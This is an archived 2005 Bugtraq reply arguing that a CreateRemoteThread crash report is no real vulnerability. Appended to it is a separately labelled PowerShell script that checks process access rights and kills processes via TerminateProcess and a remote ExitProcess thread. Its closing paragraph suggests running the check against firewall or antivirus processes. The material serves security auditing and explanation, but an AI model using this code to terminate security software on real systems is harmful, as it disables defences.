Date: Fri, 2 Dec 2005 06:41:18 -0800
From: "Michael Wojcik" <Michael.Wojcik@...rofocus.com>
To: <bugtraq@...urityfocus.com>
Subject: RE: Microsoft Windows CreateRemoteThread Exploit


> From: q7x@...iyane.com [mailto:q7x@...iyane.com] 
> Sent: Thursday, 01 December, 2005 05:02
>
>   Description:
>    When one process is opened with the OpenProcess function and
> CreateRemoteThread(Process,0,0,x,0,0,0) is used, then the process crashes.
>    For example, hackers can use this method to kill firewalls
> and antiviruses.

If an attacker can successfully call OpenProcess() on a process with
arbitrary access, then they can just request PROCESS_TERMINATE access
and terminate the process with TerminateProcess().  Other attacks are
obviously possible with other forms of access.

I don't see how this particular feature is a vulnerability unless an
attacker can somehow perform a successful OpenProcess() but only with
PROCESS_CREATE_THREAD access.  And even then, why couldn't the attacker
just do:

CreateRemoteThread(Process, NULL, 0, (LPTHREAD_START_ROUTINE)_exit,
NULL, 0, NULL);

or indeed create a remote thread with any other useful function the
process has mapped?

This "exploit" boils down to "if I can make a process call address 0, I
can cause an exception in it".  Well, sure.  If you can make a process
execute arbitrary code, you can do all sorts of things.

An attacker who can successfully open a security-critical process has
already won.

-- 
Michael Wojcik
Principal Software Systems Developer, Micro Focus
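The following PowerShell script is an added example, not code from the original post or from Micro Focus. It demonstrates Wojcik's point with the plain Windows API: first it probes which access rights OpenProcess() actually grants the caller on a target PID (the check a practitioner would run against a security product's process), then it kills a constructed target both ways the reply describes, with TerminateProcess() when PROCESS_TERMINATE is granted and with CreateRemoteThread() pointed at an already-mapped function when thread-creation access is granted. The remote-thread path uses kernel32!ExitProcess rather than the post's _exit, because kernel32.dll is mapped at the same base in every process of the same bitness within a boot session, so the address resolved in the caller is valid in the target. The function names and the sleeping child processes used as targets are this example's own assumptions.

```powershell
# Added example (not from the original post). Run as the user whose access you
# want to measure; requires Windows PowerShell or PowerShell 7 on Windows.
Add-Type -Namespace Win32 -Name Proc -MemberDefinition @"
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool TerminateProcess(IntPtr hProcess, uint uExitCode);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize,
    IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll", CharSet=CharSet.Ansi, SetLastError=true)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", CharSet=CharSet.Ansi, ExactSpelling=true, SetLastError=true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
[DllImport("kernel32.dll", SetLastError=true)]
public static extern bool CloseHandle(IntPtr hObject);
"@

# Process access-right bits from winnt.h.
$Rights = [ordered]@{
    PROCESS_TERMINATE                 = 0x0001
    PROCESS_CREATE_THREAD             = 0x0002
    PROCESS_VM_OPERATION              = 0x0008
    PROCESS_VM_READ                   = 0x0010
    PROCESS_VM_WRITE                  = 0x0020
    PROCESS_QUERY_INFORMATION         = 0x0400
    PROCESS_QUERY_LIMITED_INFORMATION = 0x1000
}

function Get-GrantedProcessAccess([int]$ProcessId) {
    # OpenProcess fails if ANY requested bit is denied, so ask for each right on its own.
    $granted = @()
    foreach ($name in $Rights.Keys) {
        $h = [Win32.Proc]::OpenProcess([uint32]$Rights[$name], $false, [uint32]$ProcessId)
        if ($h -ne [IntPtr]::Zero) {
            $granted += $name
            [void][Win32.Proc]::CloseHandle($h)
        }
    }
    return $granted
}

function Stop-ProcessViaTerminate([int]$ProcessId) {
    # The direct route: PROCESS_TERMINATE is all TerminateProcess() needs.
    $h = [Win32.Proc]::OpenProcess([uint32]$Rights.PROCESS_TERMINATE, $false, [uint32]$ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess(PROCESS_TERMINATE) failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try { return [Win32.Proc]::TerminateProcess($h, 1) }
    finally { [void][Win32.Proc]::CloseHandle($h) }
}

function Stop-ProcessViaRemoteThread([int]$ProcessId) {
    # The route the post discusses: run a function the target already has mapped.
    # These are the rights CreateRemoteThread is documented to require.
    $access = [uint32]($Rights.PROCESS_CREATE_THREAD -bor $Rights.PROCESS_QUERY_INFORMATION -bor
                       $Rights.PROCESS_VM_OPERATION  -bor $Rights.PROCESS_VM_WRITE -bor $Rights.PROCESS_VM_READ)
    $h = [Win32.Proc]::OpenProcess($access, $false, [uint32]$ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess for CreateRemoteThread failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        # kernel32.dll shares one base across same-bitness processes in a boot session
        # (assumption: caller and target have the same bitness), so the local address of
        # ExitProcess is also its address inside the target. With lpParameter = NULL the
        # target exits with code 0 instead of crashing at address 0 as in the "exploit".
        $k32  = [Win32.Proc]::GetModuleHandle("kernel32.dll")
        $exit = [Win32.Proc]::GetProcAddress($k32, "ExitProcess")
        $t = [Win32.Proc]::CreateRemoteThread($h, [IntPtr]::Zero, 0, $exit, [IntPtr]::Zero, 0, [IntPtr]::Zero)
        if ($t -eq [IntPtr]::Zero) {
            throw "CreateRemoteThread failed, Win32 error $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
        }
        [void][Win32.Proc]::CloseHandle($t)
        return $true
    }
    finally { [void][Win32.Proc]::CloseHandle($h) }
}

# Constructed targets: two harmless children of this script that just sleep.
$targets = 1..2 | ForEach-Object {
    Start-Process -FilePath "powershell.exe" -ArgumentList '-NoProfile','-Command','Start-Sleep -Seconds 120' `
                  -WindowStyle Hidden -PassThru
}
"Rights granted on PID $($targets[0].Id): $((Get-GrantedProcessAccess $targets[0].Id) -join ', ')"

[void](Stop-ProcessViaTerminate $targets[0].Id)
[void](Stop-ProcessViaRemoteThread $targets[1].Id)
foreach ($p in $targets) {
    $dead = $p.WaitForExit(5000)
    "PID $($p.Id) exited: $dead (exit code $($p.ExitCode))"
}
```

To apply the check from the reply to a real deployment, call Get-GrantedProcessAccess with the PID of the firewall or antivirus service from an ordinary user session; if PROCESS_TERMINATE or the CreateRemoteThread set comes back granted, the process is already killable through documented API calls and the "crash at address 0" adds nothing. The remote-thread kill here relies on the target loading kernel32.dll at the same base as the caller, which holds for same-bitness processes in one boot session but not across a 32/64-bit boundary.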

